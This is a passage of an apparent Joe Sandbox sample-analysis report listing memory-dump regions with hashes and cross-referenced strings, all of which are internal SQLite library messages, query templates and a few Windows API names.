                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
                                                                • API String ID: 0-1405699761
                                                                • Opcode ID: ff1ce5095c8f668de40b8f75415c503605bbc9692c9966878d62309e12968917
                                                                • Instruction ID: 1f22f933566bc71fe345fc7e324cfd0dc3287715cd81173f7ac5057cd510489e
                                                                • Opcode Fuzzy Hash: ff1ce5095c8f668de40b8f75415c503605bbc9692c9966878d62309e12968917
                                                                • Instruction Fuzzy Hash: 75318072A042258BD7012E389DC8BBA7738E7427B1F224777E907C7551D725E444CEA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: string or blob too big
                                                                • API String ID: 0-2803948771
                                                                • Opcode ID: 9adfeed01e0fb2d91d4fdae51fe34eecee2256b8e3857181bbcfd4310c7767e2
                                                                • Instruction ID: f40f614d51c3098bfd6c0306332067f4059e2674647186ca5e39841ffe404ee6
                                                                • Opcode Fuzzy Hash: 9adfeed01e0fb2d91d4fdae51fe34eecee2256b8e3857181bbcfd4310c7767e2
                                                                • Instruction Fuzzy Hash: 873150B2904215DBD7064A1CAC107B637599B82334F398259FDD56B3D3D367E906C293
                                                                Strings
                                                                • SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 1D82DF4F
                                                                • sqlite_stat1, xrefs: 1D82DF30
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1
                                                                • API String ID: 0-3572622772
                                                                • Opcode ID: 87cc047d9a78f966e0e345bcb66d99dc8db89cea5d9020ec75db92d7c480cc1a
                                                                • Instruction ID: 8c450a31287e191bcb5f88bb66d28be161830d9013d5c9b374c2504ffc0c1530
                                                                • Opcode Fuzzy Hash: 87cc047d9a78f966e0e345bcb66d99dc8db89cea5d9020ec75db92d7c480cc1a
                                                                • Instruction Fuzzy Hash: 2E21D275A053459BCB10DE2DD8C0E7ABBA4EF81624F56412CFC489B261E330E844C7E7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: OsError 0x%lx (%lu)
                                                                • API String ID: 0-3720535092
                                                                • Opcode ID: 28379a98c0c4f4ec12644cafadb29546270bff95468d58c0adb359d6ff5878b0
                                                                • Instruction ID: 8349c7debecba5d0706319cafd7c8657adaf5c64484cbc6e4e8561a478f026f1
                                                                • Opcode Fuzzy Hash: 28379a98c0c4f4ec12644cafadb29546270bff95468d58c0adb359d6ff5878b0
                                                                • Instruction Fuzzy Hash: 3921C272608220EBEB006BA4DD88FAB37B8FF426D6F144668F905D6150DB35D910DFA3
                                                                Strings
                                                                • ALTER TABLE %Q.'%q_node' RENAME TO "%w_node";ALTER TABLE %Q.'%q_parent' RENAME TO "%w_parent";ALTER TABLE %Q.'%q_rowid' RENAME TO "%w_rowid";, xrefs: 1D7687B9
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ALTER TABLE %Q.'%q_node' RENAME TO "%w_node";ALTER TABLE %Q.'%q_parent' RENAME TO "%w_parent";ALTER TABLE %Q.'%q_rowid' RENAME TO "%w_rowid";
                                                                • API String ID: 0-2843444156
                                                                • Opcode ID: ee54880a83bc3c6e6420bd272d97a5b19a647624f2691bbdfb1b2eb21f2a3a54
                                                                • Instruction ID: 93998331efa49a98a55019ec67b32159bc70e125a1d27810126fcb4abb6929ac
                                                                • Opcode Fuzzy Hash: ee54880a83bc3c6e6420bd272d97a5b19a647624f2691bbdfb1b2eb21f2a3a54
                                                                • Instruction Fuzzy Hash: E811ABB1614021BFE3109719EC89F777378EB852A2F044239F904D7250D728E855CAB6
                                                                Strings
                                                                • GetXStateFeaturesMask, xrefs: 1D910E34
                                                                • InitializeCriticalSectionEx, xrefs: 1D910E84
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
                                                                • API String ID: 0-4196971266
                                                                • Opcode ID: b64c92d4af70955f3b7bd6b9acf852c6610dd3a7affef5549a36fd2fd01bbf5d
                                                                • Instruction ID: a5c670d9ea2f0d8b66e852f53b14f3982e10550fe37514651f4c7175e3e2e2d5
                                                                • Opcode Fuzzy Hash: b64c92d4af70955f3b7bd6b9acf852c6610dd3a7affef5549a36fd2fd01bbf5d
                                                                • Instruction Fuzzy Hash: DE01843564417CB7DB126A91CC05EEE3E25FB827F1F014026FE1C2A221DA735860D6D2
                                                                Strings
                                                                • DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 1D75F752
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
                                                                • API String ID: 0-2071071404
                                                                • Opcode ID: 391004f6524dfb2d2f40578c5efc6a022a7d1f4083ed75023a02ea31f663b118
                                                                • Instruction ID: 2f3583a7297fb7870f07496f53af31b18b9f0187f15083077c1468e853f6b7e3
                                                                • Opcode Fuzzy Hash: 391004f6524dfb2d2f40578c5efc6a022a7d1f4083ed75023a02ea31f663b118
                                                                • Instruction Fuzzy Hash: E311A775504111AFE3005728ECC9F7B73BCEB462A5F40062AF905D6151EB64F844CA73
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: F
                                                                • API String ID: 0-1304234792
                                                                • Opcode ID: 6e5832eb67d8997e47f5c6b16b4c335d78cb03d45d59dc8f217d71507943ebb3
                                                                • Instruction ID: 88c87cc6975cf15a9f32977c08d1aa2a5bab45843ca9509e5884dab9529eb759
                                                                • Opcode Fuzzy Hash: 6e5832eb67d8997e47f5c6b16b4c335d78cb03d45d59dc8f217d71507943ebb3
                                                                • Instruction Fuzzy Hash: 15119DB56083409BD704CF29D84575FBBE4AFC8229F85086EE98A87390E774E508CB93
                                                                Strings
                                                                • SELECT %s WHERE rowid = ?, xrefs: 1D78F017
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: SELECT %s WHERE rowid = ?
                                                                • API String ID: 0-866778640
                                                                • Opcode ID: 5ca11579b123db3cb7873781f5b421dd3904b78a3e55f1ce97302a3061968a76
                                                                • Instruction ID: 3256696dc727c60a79c56a9b5806ea6c4fcb454de9b1f0ecba83bc442d1e08c9
                                                                • Opcode Fuzzy Hash: 5ca11579b123db3cb7873781f5b421dd3904b78a3e55f1ce97302a3061968a76
                                                                • Instruction Fuzzy Hash: AB11257230438AAFD7204B9AEC40FA2F794EB40232F10852FF65996641EB73B45187A2
                                                                Strings
                                                                • API call with %s database connection pointer, xrefs: 1D767220
                                                                • invalid, xrefs: 1D76721B
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: API call with %s database connection pointer$invalid
                                                                • API String ID: 0-3574585026
                                                                • Opcode ID: 473fd52322db5df2efa5683adea252b83c3ea97525c6594ea04f62dc9eccabc8
                                                                • Instruction ID: 6336271a695ede827aec02a868463d336ad146db2297bcb8720d20e762de2752
                                                                • Opcode Fuzzy Hash: 473fd52322db5df2efa5683adea252b83c3ea97525c6594ea04f62dc9eccabc8
                                                                • Instruction Fuzzy Hash: 70F0C871B046109FEF105928EC14BB3B7B65B41371F01469AF95693691F321E45486A3
                                                                Strings
                                                                • CREATE TABLE x(sql,ncol,ro,busy,nscan,nsort,naidx,nstep,reprep,run,mem), xrefs: 1D7485B6
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CREATE TABLE x(sql,ncol,ro,busy,nscan,nsort,naidx,nstep,reprep,run,mem)
                                                                • API String ID: 0-3640693396
                                                                • Opcode ID: 0c91f2307c151cf47a874722f30963791526c0fb43456bbbf61420453027f244
                                                                • Instruction ID: 3baf543ded35731e810e280805de1d6f45ae66a3c736e6ac35609cc0b3e422dd
                                                                • Opcode Fuzzy Hash: 0c91f2307c151cf47a874722f30963791526c0fb43456bbbf61420453027f244
                                                                • Instruction Fuzzy Hash: FAF0F0316042558AC3019B1EFC01B9AE3D49FD1232F06816BF908DB221E7A4E882C7A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %z%s%z
                                                                • API String ID: 0-3434679432
                                                                • Opcode ID: 71936c7021c6c6afeaed230fd9ba94531e5f78801d59fc4fa0b1f718de73c0fc
                                                                • Instruction ID: cc56b4ff9c555923bcbee1b0224f81bcb1556e65375eb5038b8498e00c6f5fb7
                                                                • Opcode Fuzzy Hash: 71936c7021c6c6afeaed230fd9ba94531e5f78801d59fc4fa0b1f718de73c0fc
                                                                • Instruction Fuzzy Hash: 9BF082B0504702AFE710CB25E95067772E8FF84215F54496DFC8ACA511E735F9498A53